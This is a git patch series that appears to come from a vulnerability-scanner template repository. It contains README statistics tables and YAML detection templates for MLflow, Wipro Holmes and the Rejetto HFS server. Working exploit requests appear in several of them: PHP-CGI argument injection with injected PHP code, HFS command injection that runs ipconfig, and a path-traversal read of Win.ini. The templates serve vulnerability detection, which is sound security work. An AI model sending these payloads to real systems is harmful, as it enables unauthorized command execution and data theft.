| | | | | +| neocase | 1 | | | | | | | | | +| discogs | 1 | | | | | | | | | +| cerio | 1 | | | | | | | | | +| dockge | 1 | | | | | | | | | +| easy-student-results | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| vsco | 1 | | | | | | | | | +| runcloud | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| efak | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| slsh | 1 | | | | | | | | | +| grandnode | 1 | | | | | | | | | +| automatedlogic | 1 | | | | | | | | | +| pantsel | 1 | | | | | | | | | +| roboform | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| time | 1 | | | | | | | | | +| ssi | 1 | | | | | | | | | +| captcha | 1 | | | | | | | | | +| business | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| cognito | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| wowjoomla | 1 | | | | | | | | | +| slideshare | 1 | | | | | | | | | +| rantli | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| sslmate | 1 | | | | | | | | | +| smartypantsplugins | 1 | | | | | | | | | +| openssl | 1 | | | | | | | | | +| holidayapi | 1 | | | | | | | | | +| turnkey | 1 | | | | | | | | | +| cse_bookstore_project | 1 | | | | | | | | | +| myfitnesspal-community | 1 | | | | | | | | | +| sila | 1 | | | | | | | | | +| haraj | 1 | | | | | | | | | +| msmswitch | 1 | | | | | | | | | +| feiyuxing | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| blender | 1 | | | | | | | | | +| my_calendar_project | 1 | | | | | | | | | +| kindsoft | 1 | | | | | | | | | +| tracking | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| hostuxsocial-mastodon-instance | 1 | | | | | | | | | +| inkbunny | 1 | | | | | | | | | +| amentotech | 1 | | | | | | | | | +| promodj | 1 | | | | | | | | | +| mastodon-chaossocial | 1 | | | | | | | | | +| wolni-slowianie | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| rockettheme | 1 | | | | | | | | | +| tiny-rss | 1 | | | | | | | | | +| cnet | 1 | | | | | | | | | +| dibiz | 1 | | | | | | | | | +| pauple | 1 | | | | | | | | | +| navicat | 1 | | | | | | | | | +| tar | 1 | | | | | | | | | +| printmonitor | 1 | | | | | | | | | +| brickset | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| wordpress_integrator_project | 1 | | | | | | | | | +| jasperreport | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| wishlistr | 1 | | | | | | | | | +| spiderflow | 1 | | | | | | | | | +| cambium | 1 | | | | | | | | | +| hanime | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| joombri | 1 | | | | | | | | | +| nexusphp | 1 | | | | | | | | | +| simple_task_managing_system_project | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| authelia | 1 | | | | | | | | | +| readthedocs | 1 | | | | | | | | | +| ti-woocommerce-wishlist | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| titan-framework | 1 | | | | | | | | | +| cerber | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| scratch | 1 | | | | | | | | | +| projectdiscovery | 1 | | | | | | | | | +| dasannetworks | 1 | | | | | | | | | +| netgate | 1 | | | | | | | | | +| advancedcustomfields | 1 | | | | | | | | | +| meduza-stealer | 1 | | | | | | | | | +| juddi | 1 | | | | | | | | | +| mastodon-social-tchncs | 1 | | | | | | | | | +| 404-to-301 | 1 | | | | | | | | | +| binatoneglobal | 1 | | | | | | | | | +| traggo | 1 | | | | | | | | | +| exchangerateapi | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| fiberhome | 1 | | | | | | | | | +| yui_project | 1 | | | | | | | | | +| cachet | 1 | | | | | | | | | +| connectbox | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| nagvis | 1 | | | | | | | | | +| philips | 1 | | | | | | | | | +| accueil | 1 | | | | | | | | | +| speedtest | 1 | | | | | | | | | +| hmc | 1 | | | | | | | | | +| toolkit | 1 | | | | | | | | | +| nconf | 1 | | | | | | | | | +| bentbox | 1 | | | | | | | | | +| chesscom | 1 | | | | | | | | | +| miracle | 1 | | | | | | | | | +| newsscript | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| audiobookshelf | 1 | | | | | | | | | +| slackholes | 1 | | | | | | | | | +| wallix | 1 | | | | | | | | | +| f3 | 1 | | | | | | | | | +| enrollment_system_project | 1 | | | | | | | | | +| dotnetblogengine | 1 | | | | | | | | | +| timesheet_next_gen_project | 1 | | | | | | | | | +| onlinefarm | 1 | | | | | | | | | +| analytify | 1 | | | | | | | | | +| contus-video-gallery | 1 | | | | | | | | | +| hackerearth | 1 | | | | | | | | | +| seeyon-oa | 1 | | | | | | | | | +| bagisto | 1 | | | | | | | | | +| teradek | 1 | | | | | | | | | +| wpdownloadmanager | 1 | | | | | | | | | +| speakout | 1 | | | | | | | | | +| canal | 1 | | | | | | | | | +| bitcoin-forum | 1 | | | | | | | | | +| hugo | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| narnoo_distributor_project | 1 | | | | | | | | | +| idnovate | 1 | | | | | | | | | +| technocrackers | 1 | | | | | | | | | +| ways-ac | 1 | | | | | | | | | +| fuji | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| armember-membership | 1 | | | | | | | | | +| slickremix | 1 | | | | | | | | | +| pie | 1 | | | | | | | | | +| red-gate | 1 | | | | | | | | | +| espocrm | 1 | | | | | | | | | +| lemlist | 1 | | | | | | | | | +| cloudfront | 1 | | | | | | | | | +| gotweb | 1 | | | | | | | | | +| properfraction | 1 | | | | | | | | | +| nvrsolo | 1 | | | | | | | | | +| privatekey | 1 | | | | | | | | | +| bookcrossing | 1 | | | | | | | | | +| myspreadshop | 1 | | | | | | | | | +| commvault | 1 | | | | | | | | | +| phacility | 1 | | | | | | | | | +| caldera | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| artists-clients | 1 | | | | | | | | | +| geth | 1 | | | | | | | | | +| customize-login-image | 1 | | | | | | | | | +| lowcygierpl | 1 | | | | | | | | | +| popup-builder | 1 | | | | | | | | | +| devbunch | 1 | | | | | | | | | +| majordomo | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| pinkbike | 1 | | | | | | | | | +| jivesoftware | 1 | | | | | | | | | +| admiralcloud | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| parse | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| hatenablog | 1 | | | | | | | | | +| amprion | 1 | | | | | | | | | +| siteeditor | 1 | | | | | | | | | +| zoomsounds | 1 | | | | | | | | | +| fortimanager | 1 | | | | | | | | | +| jcms | 1 | | | | | | | | | +| qantumthemes | 1 | | | | | | | | | +| givewp | 1 | | | | | | | | | +| rg-uac | 1 | | | | | | | | | +| businesso | 1 | | | | | | | | | +| mixlr | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| theme | 1 | | | | | | | | | +| netscaller | 1 | | | | | | | | | +| ash | 1 | | | | | | | | | +| goodjob | 1 | | | | | | | | | +| alltube | 1 | | | | | | | | | +| columbiasoft | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| allnet | 1 | | | | | | | | | +| cd-action | 1 | | | | | | | | | +| rumblechannel | 1 | | | | | | | | | +| finance | 1 | | | | | | | | | +| txjia | 1 | | | | | | | | | +| titanit | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| lvm | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| upc | 1 | | | | | | | | | +| jotform | 1 | | | | | | | | | +| hcommonssocial-mastodon-instance | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| blade | 1 | | | | | | | | | +| norton | 1 | | | | | | | | | +| mastonyc-mastodon-instance | 1 | | | | | | | | | +| opencollective | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| dolphinscheduler | 1 | | | | | | | | | +| withsecure | 1 | | | | | | | | | +| ndkdesign | 1 | | | | | | | | | +| improvmx | 1 | | | | | | | | | +| clipbucket | 1 | | | | | | | | | +| isams | 1 | | | | | | | | | +| bonobo | 1 | | | | | | | | | +| wp-upg | 1 | | | | | | | | | +| axel | 1 | | | | | | | | | +| smartgateway | 1 | | | | | | | | | +| maillist | 1 | | | | | | | | | +| kingdee-erp | 1 | | | | | | | | | +| videoxpert | 1 | | | | | | | | | +| simplerealtytheme | 1 | | | | | | | | | +| bws-error-log | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| communilink | 1 | | | | | | | | | +| overseerr | 1 | | | | | | | | | +| woo-bulk-price-update | 1 | | | | | | | | | +| patton | 1 | | | | | | | | | +| hiberworld | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| ninjaforma | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| prestashop-module | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| sogo | 1 | | | | | | | | | +| mailmap | 1 | | | | | | | | | +| gravatar | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| duolingo | 1 | | | | | | | | | +| ndk_steppingpack | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| yellowfin | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| autonomy | 1 | | | | | | | | | +| tera_charts_plugin_project | 1 | | | | | | | | | +| kramerav | 1 | | | | | | | | | +| jellyseerr | 1 | | | | | | | | | +| booked | 1 | | | | | | | | | +| platzi | 1 | | | | | | | | | +| bdsmsingles | 1 | | | | | | | | | +| wmw | 1 | | | | | | | | | +| auxin-elements | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| sri | 1 | | | | | | | | | +| libre-office | 1 | | | | | | | | | +| hubski | 1 | | | | | | | | | +| siteengine | 1 | | | | | | | | | +| getresponse | 1 | | | | | | | | | +| myspace | 1 | | | | | | | | | +| element | 1 | | | | | | | | | +| unraid | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| ipdata | 1 | | | | | | | | | +| pagecdn | 1 | | | | | | | | | +| podcastgenerator | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| secui | 1 | | | | | | | | | +| anshul_sharma | 1 | | | | | | | | | +| gohigheris | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| festivo | 1 | | | | | | | | | +| pucit.edu | 1 | | | | | | | | | +| audiocode | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| paysyspro | 1 | | | | | | | | | +| saltgui | 1 | | | | | | | | | +| icearp | 1 | | | | | | | | | +| webcontrol | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| cocca | 1 | | | | | | | | | +| portrait-archiv-shop | 1 | | | | | | | | | +| unleashed | 1 | | | | | | | | | +| acemanager | 1 | | | | | | | | | +| dwbooster | 1 | | | | | | | | | +| personal-dictionary | 1 | | | | | | | | | +| kraken | 1 | | | | | | | | | +| secure-copy-content-protection | 1 | | | | | | | | | +| microfinance_management_system_project | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 07d5a58d8b..8225785ef2 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | -| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | -| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | -| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | -| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | -| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 57 | | | | | -| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | +| cve | 2510 | dhiyaneshdk | 1322 | http | 7546 | info | 3697 | file | 337 | +| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | http | 2 | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1043 | | | +| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | +| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 60 | | | | | +| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | From f1027e46b698b02aa9dd18bde2f77263d0766509 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 7 Jun 2024 10:41:33 +0000 Subject: [PATCH 733/847] Auto README Update [Fri Jun 7 10:41:32 UTC 2024] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index cdd58890f5..280fe9265f 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | -| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | -| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | -| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | -| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | -| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 57 | | | | | -| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | +| cve | 2510 | dhiyaneshdk | 1322 | http | 7546 | info | 3697 | file | 337 | +| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | http | 2 | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1043 | | | +| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | +| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 60 | | | | | +| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | -**640 directories, 8753 files**. +**649 directories, 8827 files**. </td> </tr> From c9e461dd10f1fa118a0e8ae593d3d9b2c9687516 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jun 2024 16:16:45 +0530 Subject: [PATCH 734/847] Create CVE-2023-43472.yaml --- http/cves/2023/CVE-2023-43472.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43472.yaml diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml new file mode 100644 index 0000000000..30fecfd16e --- /dev/null +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-43472 + +info: + name: MLFlow < 2.8.1 - Sensitive Information Disclosure + author: ritikchaddha + severity: high + description: | + An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API. + impact: | + An attacker can access sensitive information stored in MLFlow. + remediation: | + Upgrade MLFlow to a version that has patched CVE-2023-43472. + reference: + - https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security + - https://nvd.nist.gov/vuln/detail/CVE-2023-43472 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-43472 + epss-score: 0.00116 + epss-percentile: 0.44809 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + metadata: + vendor: lfprojects + product: mlflow + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" + tags: cve,cve2023,mflow,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/2.0/preview/mlflow/experiments/list" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "experiment_id\":", "artifact_location\":", "lifecycle_stage\":")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and From 109b8842d210902c39bbce8719c8607bb4f24c07 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Fri, 7 Jun 2024 17:11:41 +0300 Subject: [PATCH 735/847] add CVE-2021-38146 --- http/cves/2021/CVE-2021-38146.yaml | 52 ++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2021/CVE-2021-38146.yaml diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml new file mode 100644 index 0000000000..412241e758 --- /dev/null +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-38146 + +info: + name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download + author: securityforeveryone + severity: high + description: | + The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data. + remediation: Fixed In v21.4.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38146 + - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html + - https://flippingbitz.com/post/wipro-ho-2041-cve/ + - https://www.wipro.com/holmes/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-38146 + cwe-id: CWE-22 + epss-score: 0.01735 + epss-percentile: 0.87875 + cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* + metadata: + vendor: wipro + product: holmes + tags: cve,cve2021,packetstorm,Wipro,Wipro Holmes Orchestrator,lfi + +http: + - method: POST + path: + - "{{BaseURL}}/home/download" + + headers: + Content-Type: application/json + + body: | + { + "SearchString": "C:/Windows/Win.ini", + "Msg": "" + } + + matchers-condition: and + matchers: + - type: word + words: + - "[fonts]" + - "[extensions]" + - "[files]" + condition: and + - type: status + status: + - 200 From 81f39f4ea74ff8f25e22981b4ec453f20c1ab973 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Fri, 7 Jun 2024 17:17:05 +0300 Subject: [PATCH 736/847] add CVE-2021-38147 --- http/cves/2021/CVE-2021-38147.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2021/CVE-2021-38147.yaml diff --git a/http/cves/2021/CVE-2021-38147.yaml b/http/cves/2021/CVE-2021-38147.yaml new file mode 100644 index 0000000000..80e130a5a5 --- /dev/null +++ b/http/cves/2021/CVE-2021-38147.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-38147 + +info: + name: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Excel Report Download + author: securityforeveryone + severity: high + description: | + Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to download arbitrary files, such as reports containing sensitive information, because authentication is not required for API access to processexecution/DownloadExcelFile/Domain_Credential_Report_Excel, processexecution/DownloadExcelFile/User_Report_Excel, processexecution/DownloadExcelFile/Process_Report_Excel, processexecution/DownloadExcelFile/Infrastructure_Report_Excel, or processexecution/DownloadExcelFile/Resolver_Report_Excel. + remediation: Fixed In v21.4.0 + reference: + - https://www.wipro.com/holmes/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-38147 + - https://packetstormsecurity.com/files/165039/Wipro-Holmes-Orchestrator-20.4.1-Report-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-38147 + cwe-id: CWE-306 + epss-score: 0.00497 + epss-percentile: 0.76242 + cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* + metadata: + vendor: wipro + product: holmes + tags: packetstorm,download,exposure,cve,cve2021 + +http: + - method: GET + path: + - "{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel" + - "{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel" + - "{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel" + - "{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel" + + matchers: + - type: dsl + dsl: + - "contains(body, '<?xml version=')" + - "status_code == 200" + condition: and From 538fb6bf31ae1f9edba86ec6d24f59a26af5acd0 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Fri, 7 Jun 2024 18:28:59 +0300 Subject: [PATCH 737/847] add cve-2024-4577 --- http/cves/2024/CVE-2024-4577.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4577.yaml diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml new file mode 100644 index 0000000000..2490bcdd95 --- /dev/null +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -0,0 +1,41 @@ +id: CVE-2024-4577 + +info: + name: PHP CGI Argument Injection Vulnerability + author: securityforeveryone + severity: high + description: | + CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters. + reference: + - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?123 + - https://github.com/TAM-K592/CVE-2024-4577/tree/main + tags: rce,php,cgi,cve2024,cve + +http: + - raw: + - | + POST /cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + <?php echo "vulnerable"; ?> + + - | + POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + <?php echo "vulnerable"; ?> + + matchers-condition: and + matchers: + - type: word + words: + - "index of" + - "directory" + - "vulnerable" + condition: or + + - type: status + status: + - 200 From 5635a451a70014e228d2e461379bfc04dd9e0fa2 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Fri, 7 Jun 2024 18:36:04 +0300 Subject: [PATCH 738/847] yaml fix --- http/cves/2024/CVE-2024-4577.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml index 2490bcdd95..89b8c7a511 100644 --- a/http/cves/2024/CVE-2024-4577.yaml +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -31,9 +31,9 @@ http: matchers: - type: word words: - - "index of" - - "directory" - - "vulnerable" + - "index of" + - "directory" + - "vulnerable" condition: or - type: status From e322f3142143be9fb01bf343bc1c7b30152e73ed Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Fri, 7 Jun 2024 22:04:41 -0300 Subject: [PATCH 739/847] Create CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2024/CVE-2024-23692 diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 new file mode 100644 index 0000000000..5b4a4f401b --- /dev/null +++ b/http/cves/2024/CVE-2024-23692 @@ -0,0 +1,25 @@ +id: CVE-2024-23692 + +info: + name: HFS Command Injection RCE + author: johnk3r + severity: critical + tags: rce,hfs,cve + +requests: + - method: GET + path: + - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + + matchers: + - type: regex + part: body + regex: + - "Windows IP Configuration" + - "Host Name" + + extractors: + - type: regex + part: body + regex: + - "Host Name .+ : ([^\r\n]+)" From f3bcd3e920554a5915c0f78581b6731a757102d8 Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Fri, 7 Jun 2024 22:08:35 -0300 Subject: [PATCH 740/847] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 5b4a4f401b..7c8569bf95 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,10 +1,19 @@ id: CVE-2024-23692 info: - name: HFS Command Injection RCE + name: Check Point Quantum Gateway - Information Disclosure author: johnk3r - severity: critical - tags: rce,hfs,cve + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + reference: + - https://github.com/rapid7/metasploit-framework/pull/19240 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: product:"HttpFileServer httpd" + tags: cve,cve2024,hfs,rce requests: - method: GET From cc743cfc3ad0a4d80f6451b6f9e326d8d6def24a Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Fri, 7 Jun 2024 22:10:18 -0300 Subject: [PATCH 741/847] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 7c8569bf95..f3a81865e7 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,11 +1,11 @@ id: CVE-2024-23692 info: - name: Check Point Quantum Gateway - Information Disclosure + name: Rejetto HTTP File Server - Template injection author: johnk3r severity: high description: | - CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ From 84f71fee89b8b8227fb8294bd7f26469cc918c5d Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Fri, 7 Jun 2024 22:12:47 -0300 Subject: [PATCH 742/847] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index f3a81865e7..76493f5f7d 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -3,7 +3,7 @@ id: CVE-2024-23692 info: name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: high + severity: critical description: | This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: From d201d27254d3d0a55211894daf27d058537e8168 Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Fri, 7 Jun 2024 22:13:50 -0300 Subject: [PATCH 743/847] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index 76493f5f7d..c8020027d8 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -8,7 +8,8 @@ info: This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce + - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 metadata: verified: true max-request: 1 From ff26a49d5d399b3eac593d277489752276673c07 Mon Sep 17 00:00:00 2001 From: johnk3r <johnatan2camargo@gmail.com> Date: Fri, 7 Jun 2024 22:51:25 -0300 Subject: [PATCH 744/847] Update CVE-2024-23692 --- http/cves/2024/CVE-2024-23692 | 29 +++++++++++++---------------- 1 file changed, 13 insertions(+), 16 